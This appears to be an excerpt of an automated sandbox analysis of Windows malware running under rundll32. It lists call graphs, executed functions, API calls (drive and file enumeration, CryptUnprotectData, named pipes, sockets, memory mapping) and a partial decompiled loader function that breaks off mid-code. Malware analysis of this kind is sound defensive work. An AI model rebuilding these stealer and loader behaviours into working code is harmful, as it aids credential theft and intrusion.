37115 7df471d922e4 37108->37115 37118 7df471d92307 37115->37118 37116 7df471d9238f 37116->37107 37120 7df471db48c8 37116->37120 37117 7df471d92316 LoadLibraryA 37117->37116 37117->37118 37118->37116 37118->37117 37119 7df471d9236b GetProcAddressForCaller 37118->37119 37119->37116 37119->37118 37121 7df471db48ed 37120->37121 37132 7df471db44a4 37121->37132 37123 7df471da0f5f 37128 7df471d92438 37123->37128 37124 7df471db4c1a VirtualFree 37124->37123 37125 7df471db4c35 37124->37125 37125->37123 37144 7df471db46b4 37125->37144 37127 7df471db4946 37127->37123 37127->37124 37129 7df471d92445 37128->37129 37130 7df471d9246b SetErrorMode 37128->37130 37129->37130 37131 7df471d9244b RtlAddFunctionTable 37129->37131 37130->37107 37131->37130 37133 7df471db44dc 37132->37133 37134 7df471db44e4 CreateFileW 37133->37134 37136 7df471db45e5 __swprintf_l 37133->37136 37135 7df471db4519 _malloc_dbg 37134->37135 37134->37136 37138 7df471db45dc FindCloseChangeNotification 37135->37138 37139 7df471db453c ReadFile 37135->37139 37136->37127 37138->37136 37140 7df471db45d3 ??3@YAXPEAX 37139->37140 37141 7df471db455b 37139->37141 37140->37138 37141->37140 37142 7df471db4571 VirtualAlloc 37141->37142 37142->37140 37143 7df471db4593 37142->37143 37143->37140 37145 7df471db46ce 37144->37145 37146 7df471db48b4 37145->37146 37147 7df471db44a4 6 API calls 37145->37147 37146->37125 37149 7df471db46ed 37147->37149 37148 7df471db48a3 VirtualFree 37148->37146 37149->37146 37149->37148 37150 7df471da2677 37151 7df471da267a 37150->37151 37152 7df471da26be 37151->37152 37154 7df471db38cc 2 API calls 37151->37154 37153 7df471db3aa0 _malloc_dbg 37152->37153 37155 7df471da26c8 37153->37155 37156 7df471da26b0 ??3@YAXPEAX 37154->37156 37157 7df471da26d6 _calloc_dbg 37155->37157 37158 7df471da26f0 __swprintf_l 37155->37158 37156->37151 37157->37158 37159 7df471da67b8 37160 7df471da67cd 37159->37160 37162 7df471da685b 37160->37162 37163 7df471daf200 37160->37163 37164 7df471daf235 37163->37164 37165 7df471daf38e 37164->37165 37166 7df471daf411 RegOpenKeyW 37164->37166 37167 7df471daf40c 37164->37167 37171 7df471daea10 _malloc_dbg __swprintf_l 37165->37171 37166->37167 37169 7df471daf42f 37166->37169 37167->37162 37172 7df471daea10 _malloc_dbg __swprintf_l 37169->37172 37171->37167 37172->37167 37173 7df471da3e3a 37174 7df471db2fa4 5 API calls 37173->37174 37175 7df471da3e3f 37174->37175 37176 7df471db2fa4 5 API calls 37175->37176 37179 7df471da3e75 37175->37179 37176->37179 37177 7df471da3fa1 MapViewOfFile 37181 7df471da3fc9 37177->37181 37178 7df471da4086 __swprintf_l 37179->37177 37179->37178 37180 7df471da36a0 20 API calls 37180->37178 37181->37178 37181->37180 37182 7df471da8c4c RegOpenKeyExW 37183 7df471da8db3 37182->37183 37185 7df471da8c8d 37182->37185 37184 7df471dad454 _calloc_dbg 37184->37185 37185->37183 37185->37184 37186 7df471da75ac CreateFileW 37187 7df471da75e6 _calloc_dbg 37186->37187 37188 7df471da7631 37186->37188 37187->37188 37190 7df471da760c ReadFile 37187->37190 37190->37188 37191 7df471dac06c 37192 7df471dac08e 37191->37192 37193 7df471dac0ff 37191->37193 37192->37193 37194 7df471dac0cd CryptUnprotectData 37192->37194 37194->37193 37195 7df471db0bac 37196 7df471db0bdf 37195->37196 37198 7df471db0c17 __swprintf_l 37195->37198 37196->37198 37199 7df471da15e4 37196->37199 37200 7df471da1e7a 37199->37200 37201 7df471da1618 37199->37201 37200->37198 37201->37200 37202 7df471da1e2c 37201->37202 37204 7df471dad454 _calloc_dbg 37201->37204 37202->37200 37203 7df471da1e4b CreateThread 37202->37203 37203->37200 37204->37201 37205 7df471da2b50 lstrcmpiW 37206 7df471da2b6e 37205->37206 37207 7df471da15a4 37208 7df471da15b2 37207->37208 37209 7df471da15c3 37207->37209 37211 7df471da8718 37208->37211 37212 7df471da7b7c 3 API calls 37211->37212 37216 7df471da8754 37212->37216 37213 7df471da8c1c __swprintf_l 37213->37209 37214 7df471da889a GetLogicalDrives 37214->37216 37215 7df471da88ab GetDriveTypeW 37215->37216 37216->37213 37216->37214 37216->37215 37217 7df471da828c _calloc_dbg FindFirstFileW FindNextFileW 37216->37217 37217->37216 37222 7df471dd48e4 37223 7df471dd4908 socket 37222->37223 37224 7df471dd4989 bind 37222->37224 37225 7df471dd493b 37223->37225 37228 7df471dd4920 37223->37228 37224->37228 37225->37228 37229 7df471dd44f4 ioctlsocket 37225->37229 37227 7df471dd4985 37227->37224 37227->37228 37230 7df471dd4549 CreateIoCompletionPort 37229->37230 37232 7df471dd4531 37229->37232 37231 7df471dd4561 37230->37231 37231->37232 37233 7df471dd4596 SetFileCompletionNotificationModes 37231->37233 37232->37227 37233->37232 37234 17ed6fd0000 37235 17ed6fd000a 37234->37235 37242 17ed6fd30d0 37235->37242 37237 17ed6fd35f7 37239 17ed6fd35e6 RtlDeleteBoundaryDescriptor 37239->37237 37240 17ed6fd3582 VirtualAlloc 37241 17ed6fd359d 37240->37241 37241->37239 37243 17ed6fd3440 37242->37243 37244 17ed6fd3106 37242->37244 37243->37237 37243->37240 37243->37241 37244->37243 37245 17ed6fd3202 RtlAllocateHeap 37244->37245 37245->37243 37246 17ed6fd321c 37245->37246 37246->37243 37247 17ed6fd32e9 RtlAllocateHeap 37246->37247 37247->37243 37248 17ed6fd3307 37247->37248 37254 17ed6fd2fec 37248->37254 37250 17ed6fd3435 RtlDeleteBoundaryDescriptor 37250->37243 37251 17ed6fd3330 37252 17ed6fd33de RtlAllocateHeap 37251->37252 37253 17ed6fd33f3 37251->37253 37252->37253 37253->37250 37255 17ed6fd3022 37254->37255 37258 17ed6fd4f60 37255->37258 37257 17ed6fd30bc 37257->37251 37259 17ed6fd4fa0 37258->37259 37261 17ed6fd4f96 37258->37261 37262 17ed6fd4f20 37259->37262 37261->37257 37263 17ed6fd4f36 37262->37263 37264 17ed6fd4f4a 37263->37264 37266 17ed6fd4eb0 37263->37266 37264->37261 37267 17ed6fd4ed8 37266->37267 37268 17ed6fd4f0e 37267->37268 37269 17ed6fd4ef4 RtlAllocateHeap 37267->37269 37268->37264 37269->37268

                                                                  Executed Functions

                                                                  Function 00007DF471DA8718 Relevance: 11.0, APIs: 2, Strings: 4, Instructions: 492COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 111 7df471da8718-7df471da8758 call 7df471da7b7c 114 7df471da8c1c-7df471da8c49 call 7df471da7cc4 call 7df471dcf670 111->114 115 7df471da875e-7df471da8765 111->115 117 7df471da876b-7df471da8797 115->117 122 7df471da879d-7df471da87b4 117->122 123 7df471da8ba4-7df471da8be7 call 7df471da828c 117->123 127 7df471da8b31-7df471da8b4a 122->127 128 7df471da87ba-7df471da87d3 122->128 138 7df471da8bec 123->138 133 7df471da8b50-7df471da8ba2 call 7df471da828c 127->133 134 7df471da8c09-7df471da8c16 127->134 135 7df471da87de-7df471da87e2 128->135 133->138 134->114 134->117 136 7df471da87d5-7df471da87d8 135->136 137 7df471da87e4-7df471da87e5 135->137 139 7df471da87e7 136->139 140 7df471da87da-7df471da87db 136->140 137->139 143 7df471da8bee-7df471da8bef 138->143 144 7df471da8bf1-7df471da8c04 call 7df471da8564 138->144 139->134 147 7df471da87ed-7df471da8838 139->147 140->135 143->144 144->134 147->134 152 7df471da883e-7df471da885c 147->152 154 7df471da8882-7df471da8885 152->154 155 7df471da885e-7df471da8865 154->155 156 7df471da8887-7df471da88a4 call 7df471dcf690 GetLogicalDrives 154->156 158 7df471da8867-7df471da886a 155->158 159 7df471da887b-7df471da887c 155->159 164 7df471da8901-7df471da8904 156->164 165 7df471da88a6-7df471da88a9 156->165 162 7df471da886c-7df471da886f 158->162 163 7df471da8876-7df471da8879 158->163 160 7df471da887e-7df471da887f 159->160 160->154 162->160 166 7df471da8871-7df471da8874 162->166 163->160 167 7df471da890b-7df471da890e 164->167 168 7df471da88f4-7df471da88ff 165->168 169 7df471da88ab-7df471da88bc GetDriveTypeW 165->169 166->160 170 7df471da8910-7df471da8930 167->170 171 7df471da8954-7df471da895d 167->171 168->164 168->165 172 7df471da88be-7df471da88c1 169->172 173 7df471da88da-7df471da88e0 169->173 170->171 183 7df471da8932-7df471da894f call 7df471da828c 170->183 171->167 174 7df471da895f-7df471da896f 171->174 175 7df471da88d1-7df471da88d8 172->175 176 7df471da88c3-7df471da88c6 172->176 177 7df471da88e2 173->177 179 7df471da8b23-7df471da8b2c 174->179 180 7df471da8975-7df471da898f call 7df471dcf69c 174->180 175->177 176->168 181 7df471da88c8-7df471da88cf 176->181 177->168 182 7df471da88e4-7df471da88ed 177->182 179->134 188 7df471da89aa-7df471da89b5 180->188 181->177 182->168 183->171 189 7df471da8991-7df471da89a6 188->189 190 7df471da89b7-7df471da89c9 188->190 189->188 193 7df471da89cf-7df471da8a19 call 7df471dcf5d2 190->193 194 7df471da8b16-7df471da8b1d 190->194 197 7df471da8a88-7df471da8afb 193->197 198 7df471da8a1b-7df471da8a1f 193->198 194->179 203 7df471da8afd-7df471da8b0c call 7df471dd3468 197->203 204 7df471da8b11-7df471da8b12 197->204 199 7df471da8a21-7df471da8a81 198->199 208 7df471da8a83-7df471da8a84 199->208 203->204 204->194 208->197
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.411844112.00007DF471D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF471D90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7df471d90000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: DriveDrivesLogicalType_malloc_dbg
                                                                  • String ID: :$A$\$\
                                                                  • API String ID: 3996654904-2970747007
                                                                  • Opcode ID: b0a694621581a0022aa59e7e97eb46f4cad8955d03962f010717c508dea69b99
                                                                  • Instruction ID: 4fe18cd72ccc152118519a17c0d190a22a7ed2be7d4b62c8564343103e411cc0
                                                                  • Opcode Fuzzy Hash: b0a694621581a0022aa59e7e97eb46f4cad8955d03962f010717c508dea69b99
                                                                  • Instruction Fuzzy Hash: 27F14F3151CA489BEB69EF18D886BEA73F0FB98301F54452BD48FC3151DA78B945CB82
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00007DF471DB2FA4 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122nativememoryfileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.411844112.00007DF471D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF471D90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7df471d90000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: File$AllocCloseInformationOpenSectionUnmapViewVirtual
                                                                  • String ID: MZ
                                                                  • API String ID: 528985955-2410715997
                                                                  • Opcode ID: 253709c67f866cad63d2114e2eba81f682406bc4814dbad8a8ae5e500d44b8a8
                                                                  • Instruction ID: f7bb035a5c78e11b0d9c561eac8ab934b62dd526d242194d897790017b5d778e
                                                                  • Opcode Fuzzy Hash: 253709c67f866cad63d2114e2eba81f682406bc4814dbad8a8ae5e500d44b8a8
                                                                  • Instruction Fuzzy Hash: BA31D620B1CA586BFBA4AB6C9854F6A32E4EFD9340F50003AE44FC32D1DE6CF8454B81
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00007DF471DA36A0 Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 570threadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 239 7df471da36a0-7df471da36fe call 7df471dd21bc * 2 call 7df471dd2d8c 246 7df471da3cb4-7df471da3cd7 call 7df471dcf670 239->246 247 7df471da3704-7df471da3722 call 7df471d92bfc 239->247 253 7df471da372e-7df471da3753 call 7df471db30dc 247->253 254 7df471da3724-7df471da372c 247->254 255 7df471da3757-7df471da375b 253->255 254->255 258 7df471da3cae 255->258 259 7df471da3761-7df471da37ad call 7df471dcf690 255->259 258->246 259->258 263 7df471da37b3-7df471da37e7 259->263 267 7df471da37ed-7df471da384b call 7df471dad3dc call 7df471d92918 263->267 268 7df471da3ca5-7df471da3ca6 263->268 273 7df471da3851-7df471da38bb 267->273 274 7df471da3a45-7df471da3a50 call 7df471d91a58 267->274 268->258 275 7df471da38bd-7df471da38df 273->275 276 7df471da3919 273->276 281 7df471da3c8c-7df471da3c99 call 7df471dad3f4 274->281 282 7df471da3a56-7df471da3a76 274->282 280 7df471da38e1-7df471da38f4 call 7df471d92c8c 275->280 279 7df471da391b-7df471da392e call 7df471d92c8c 276->279 290 7df471da3930-7df471da3938 279->290 291 7df471da3945-7df471da3954 279->291 292 7df471da38f6-7df471da38fe 280->292 293 7df471da390b-7df471da3917 280->293 281->268 301 7df471da3a87-7df471da3a8b 282->301 302 7df471da3a78-7df471da3a7f 282->302 290->291 294 7df471da393a-7df471da3940 call 7df471da20c0 290->294 291->279 295 7df471da3956-7df471da3957 291->295 292->293 296 7df471da3900-7df471da3906 call 7df471da20c0 292->296 293->276 293->280 294->291 299 7df471da395a-7df471da3994 call 7df471d92c8c 295->299 296->293 311 7df471da3a22-7df471da3a3b call 7df471da21a4 call 7df471d92be8 299->311 312 7df471da399a-7df471da39a2 299->312 303 7df471da3a8d 301->303 304 7df471da3a97-7df471da3aa2 301->304 302->301 303->304 309 7df471da3c23-7df471da3c2a 304->309 310 7df471da3aa8-7df471da3ad9 call 7df471dcf69c call 7df471db25c8 304->310 315 7df471da3c4e-7df471da3c55 309->315 310->309 329 7df471da3adf-7df471da3c0c call 7df471dd4320 call 7df471dd3c88 call 7df471da93f8 call 7df471da23e4 call 7df471dd33bc call 7df471daba7c CreateThread FindCloseChangeNotification call 7df471dd3f9c 310->329 328 7df471da3a40-7df471da3a41 311->328 313 7df471da3a14-7df471da3a1c 312->313 314 7df471da39a4-7df471da39b9 312->314 313->299 313->311 314->313 326 7df471da39bb-7df471da3a12 call 7df471dcf5d2 314->326 318 7df471da3c2c-7df471da3c48 ??3@YAXPEAX@Z 315->318 319 7df471da3c57-7df471da3c5d 315->319 318->315 330 7df471da3c81-7df471da3c85 319->330 326->313 328->274 351 7df471da3c11-7df471da3c17 call 7df471dabac8 329->351 333 7df471da3c5f-7df471da3c78 330->333 334 7df471da3c87 call 7df471d91aac 330->334 333->330 334->281 351->309
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.411844112.00007DF471D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF471D90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7df471d90000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@ChangeCloseCreateFindNotificationThread_calloc_dbg
                                                                  • String ID: d
                                                                  • API String ID: 166476311-2564639436
                                                                  • Opcode ID: f8442b9e398ab651c0b0ad759ddfe03e1ed3a010777be940d021345a2825fb8b
                                                                  • Instruction ID: e505ebf985e7748eadcd7875a46a8ebcebfd059896ed630cb46b6c5e253bcfad
                                                                  • Opcode Fuzzy Hash: f8442b9e398ab651c0b0ad759ddfe03e1ed3a010777be940d021345a2825fb8b
                                                                  • Instruction Fuzzy Hash: 54121A7051CA489FEBA5EF28D85579AB7E1FB94300F10462FE48EC3291DE74E9458B82
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00007DF471DA828C Relevance: 4.7, APIs: 3, Instructions: 241fileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.411844112.00007DF471D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF471D90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7df471d90000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: FileFind$FirstNext_calloc_dbg
                                                                  • String ID:
                                                                  • API String ID: 2554685749-0
                                                                  • Opcode ID: cc4e1f58a741e0a847789479910143e1a41a58a390ab4c56df2ab5461faa735f
                                                                  • Instruction ID: 8c0a407a187e505e6e8a5b967585f492505b9c83e9ea02d23ee691dacd90a436
                                                                  • Opcode Fuzzy Hash: cc4e1f58a741e0a847789479910143e1a41a58a390ab4c56df2ab5461faa735f
                                                                  • Instruction Fuzzy Hash: 07812E31608A489FEB64EF18D889B9673E1FBD4301F14467BD88AC7195DB74F944CB82
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00007DF471DA782C Relevance: 4.6, APIs: 3, Instructions: 135fileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.411844112.00007DF471D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF471D90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7df471d90000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Find$File$CloseFirstNext
                                                                  • String ID:
                                                                  • API String ID: 3541575487-0
                                                                  • Opcode ID: 5473507164dcd3926eec300200079bceabdad213ffc4607040328178f24ee394
                                                                  • Instruction ID: 3bad4c6970630e0dd62339d84d6422282b289ef980011e5298d98c9e92a0bedd
                                                                  • Opcode Fuzzy Hash: 5473507164dcd3926eec300200079bceabdad213ffc4607040328178f24ee394
                                                                  • Instruction Fuzzy Hash: B341213171CE585FEB94EB28D8596AA77E1FBD5301F50493BE04BC3290DE39E9048B82
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00007DF471DAB92C Relevance: 4.6, APIs: 3, Instructions: 110pipeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.411844112.00007DF471D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF471D90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7df471d90000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: NamedPipe$BindCallbackCompletionConnectCreate
                                                                  • String ID:
                                                                  • API String ID: 2502124517-0
                                                                  • Opcode ID: 86698cdaea6b070168e9757c8e61cb38fc1f5760e73426677b828c464fbefd93
                                                                  • Instruction ID: 6f3c0a49ee4d38030473bb7583c000727dcbab01c8144401554563f3aed63a31
                                                                  • Opcode Fuzzy Hash: 86698cdaea6b070168e9757c8e61cb38fc1f5760e73426677b828c464fbefd93
                                                                  • Instruction Fuzzy Hash: 82314E3061CA488FE7A4DF28D89879B77E1FBD5311F50462AD09BC21D0DB78E945CB82
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00007DF471DB2E88 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 92filenativeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.411844112.00007DF471D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF471D90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7df471d90000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: FileOpen
                                                                  • String ID: 0
                                                                  • API String ID: 2669468079-4108050209
                                                                  • Opcode ID: 2e6f29b8a254670fdcb33b5353e1a5392e46972b227b1767ba81a870637305b8
                                                                  • Instruction ID: 7ecaa3b4b43042107eb3f11465a2d9549946f112c91d265251b8f0bfbfb1f91c
                                                                  • Opcode Fuzzy Hash: 2e6f29b8a254670fdcb33b5353e1a5392e46972b227b1767ba81a870637305b8
                                                                  • Instruction Fuzzy Hash: B731127161CA889FD794DF69C4C4B9AB7E0FB99340F50492EA09EC32A0D774A544CB42
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00007DF471DD48E4 Relevance: 3.1, APIs: 2, Instructions: 93networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • socket.WS2_32(?,?,?,?,?,?,?,?,00000063,00000062,-00000002,00007DF471DD4A05), ref: 00007DF471DD4911
                                                                    • Part of subcall function 00007DF471DD44F4: ioctlsocket.WS2_32 ref: 00007DF471DD4520
                                                                  • bind.WS2_32(?,?,?,?,?,?,?,?,00000063,00000062,-00000002,00007DF471DD4A05), ref: 00007DF471DD4996
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.411844112.00007DF471D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF471D90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7df471d90000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: bindioctlsocketsocket
                                                                  • String ID:
                                                                  • API String ID: 3555158474-0
                                                                  • Opcode ID: 75cc138a21902604a50bf09fc40c7ad2cb5a7822a798501e5f08a21d0d77f662
                                                                  • Instruction ID: b0cc87ca4073d00f46e534e3775e5d733d96293274bb4e7d0286e87a3ead1e97
                                                                  • Opcode Fuzzy Hash: 75cc138a21902604a50bf09fc40c7ad2cb5a7822a798501e5f08a21d0d77f662
                                                                  • Instruction Fuzzy Hash: B521853070C5044FE758AB39988D76632E5FF84325F1046BBD8EFC66D5DB28AC024B91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00007DF471DA15E4 Relevance: 2.3, APIs: 1, Instructions: 815threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.411844112.00007DF471D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF471D90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7df471d90000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CreateThread
                                                                  • String ID:
                                                                  • API String ID: 2422867632-0
                                                                  • Opcode ID: e204f23e07e5fe114be256f26043225e89d310e5d3f21a5691eae402d807ca03
                                                                  • Instruction ID: f4f7b982b77bf753ffc4a3112d65eb83c33d50d6dedbaf3cb84c6a595180a12d
                                                                  • Opcode Fuzzy Hash: e204f23e07e5fe114be256f26043225e89d310e5d3f21a5691eae402d807ca03
                                                                  • Instruction Fuzzy Hash: 2942FA3191CB489FDB68EF58D4857AAB7E1FBD4300F50462EE58EC3261DA34B9458BC2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00007DF471DD55E8 Relevance: 1.8, APIs: 1, Instructions: 281networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.411844112.00007DF471D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF471D90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7df471d90000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Recv
                                                                  • String ID:
                                                                  • API String ID: 4192927123-0
                                                                  • Opcode ID: 0ed6c12643ef064cbca3101121e01caf1c0bee925d3670dd1d08c5da83a7306d
                                                                  • Instruction ID: 11f918f778bb032d2da4b77b3052e0711b3ed1c2e4c9f4fe09c9bb269f2f3b9a
                                                                  • Opcode Fuzzy Hash: 0ed6c12643ef064cbca3101121e01caf1c0bee925d3670dd1d08c5da83a7306d
                                                                  • Instruction Fuzzy Hash: BDA17D30A1CA85ABEBA89B1884857A6B3F1FF95314F50052BD4DFC6591DB38F8518FC1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00007DF471DAC06C Relevance: 1.6, APIs: 1, Instructions: 114encryptionCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.411844112.00007DF471D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF471D90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7df471d90000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CryptDataUnprotect
                                                                  • String ID:
                                                                  • API String ID: 834300711-0
                                                                  • Opcode ID: 065909b5226e5ffbc6317179f027ca50902e3b2efe95567b1e5a46f5e667f156
                                                                  • Instruction ID: b89aad977388d7ea2048f9a02d7c288e767218d33e3c1c38a836d051e5ae224b
                                                                  • Opcode Fuzzy Hash: 065909b5226e5ffbc6317179f027ca50902e3b2efe95567b1e5a46f5e667f156
                                                                  • Instruction Fuzzy Hash: 0C31653071CA885FE758DB68D85576AB7E1FBD9311F40452EE18BC3291DF39E8418B82
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00007DF471DB2834 Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.411844112.00007DF471D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF471D90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7df471d90000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: InformationQuerySystem
                                                                  • String ID:
                                                                  • API String ID: 3562636166-0
                                                                  • Opcode ID: d58f8b538f263f367ae549b4eb4f40a92b68296be0ce84c3cb29e4ca6c126a6e
                                                                  • Instruction ID: 8541dd0380c57d15bcf5365eec9fa35fc03643c40c723b3dd818351d2d31c139
                                                                  • Opcode Fuzzy Hash: d58f8b538f263f367ae549b4eb4f40a92b68296be0ce84c3cb29e4ca6c126a6e
                                                                  • Instruction Fuzzy Hash: 43C08C04E1CC8A6BF9A063AE4D82B0930A0ABCD700F800011A4ABC2190F60CF48047D2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000017ED6FD30D0 Relevance: 23.1, APIs: 4, Strings: 9, Instructions: 355memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.411208409.0000017ED6FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017ED6FD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_17ed6fd0000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateHeap$BoundaryDeleteDescriptor
                                                                  • String ID: $!$!Rcx$!Rex$A$D$E$H$S
                                                                  • API String ID: 2279964584-3349172591
                                                                  • Opcode ID: 65066c02667e23bd76fdc9d3f10aea0dbf6c071d317dcde6615cabaccb18c29d
                                                                  • Instruction ID: 751f499b033d26fb10df7deaa6ad94d450413bd5d0d961bc61772f33e928dd8e
                                                                  • Opcode Fuzzy Hash: 65066c02667e23bd76fdc9d3f10aea0dbf6c071d317dcde6615cabaccb18c29d
                                                                  • Instruction Fuzzy Hash: BBB1B43121CB488FD769EF58D485ADAB3E1FB99340F401A5DE58EC3146DA70F8558F82
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00007FFA06EE1178 Relevance: 13.6, APIs: 9, Instructions: 103filememorystringCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  C-Code - Quality: 44%
                                                                  			E00007FFA7FFA06EE1178(void* __rax, long long __rbx, long long __rsi, long long __rbp, void* __r8, long long _a8, long long _a16, long long _a24) {
				void* _v40;
				signed long long _v48;
				signed long long _v56;
				void* __rdi;
				void* _t34;
				void* _t53;
				void* _t55;
				void* _t64;
				signed long long* _t65;
				long long _t66;
				signed long long* _t67;
				signed long long _t77;
				void* _t82;
				void* _t88;
				signed long long _t92;
				void* _t107;
				void* _t108;
				void* _t109;
				signed long long _t111;

				_t66 = __rbx;
				_t64 = __rax;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t111 = lstrlenA(??);
				_v56 = _t111;
				if (E00007FFA7FFA06EE12F8(__rbx, __r8, _t82, _t88, __rsi,  &_v40, __r8, _t108) == 0) goto 0x6ee12de;
				_t92 = _v40;
				LocalAlloc(??, ??);
				if (_t64 == 0) goto 0x6ee12de;
				_t107 = __r8;
				_v56 = _t111;
				if (E00007FFA7FFA06EE12F8(_t66, _t64, _t92, _t64, _t92,  &_v40, __r8, _t108) != 0) goto 0x6ee1240;
				_t65 = _v40;
				r9d = _t65 + _t65;
				_t34 = E00007FFA7FFA06EE1020(_t33, _t65, _t66, _t64, _t92, _t64 + _t92, _t64 + _t92, _t109);
				if (_t34 == 0) goto 0x6ee1240;
				_t15 = _t66 + 0x40; // 0x40
				LocalAlloc(??, ??);
				_t67 = _t65;
				if (_t65 == 0) goto 0x6ee1240;
				_t17 =  &(_t65[1]); // 0x8
				r8d = _t34;
				 *_t65 = _t92;
				E00007FFA7FFA06EE1510(_t15, _t53, _t34, _t55, _t17, _t64 + _t92, _t64 + _t92);
				LocalFree(??);
				if (_t67 == 0) goto 0x6ee12de;
				_v48 = _v48 & 0x00000000;
				r9d = 0;
				_t20 = _t107 + 0x40; // 0x40
				r8d = _t20;
				_v56 =  *_t67;
				CreateFileMappingW(??, ??, ??, ??, ??, ??); // executed
				if (_t65 == 0) goto 0x6ee12d5;
				_v56 = _v56 & 0x00000000;
				r9d = 0;
				r8d = 0;
				MapViewOfFile(??, ??, ??, ??, ??); // executed
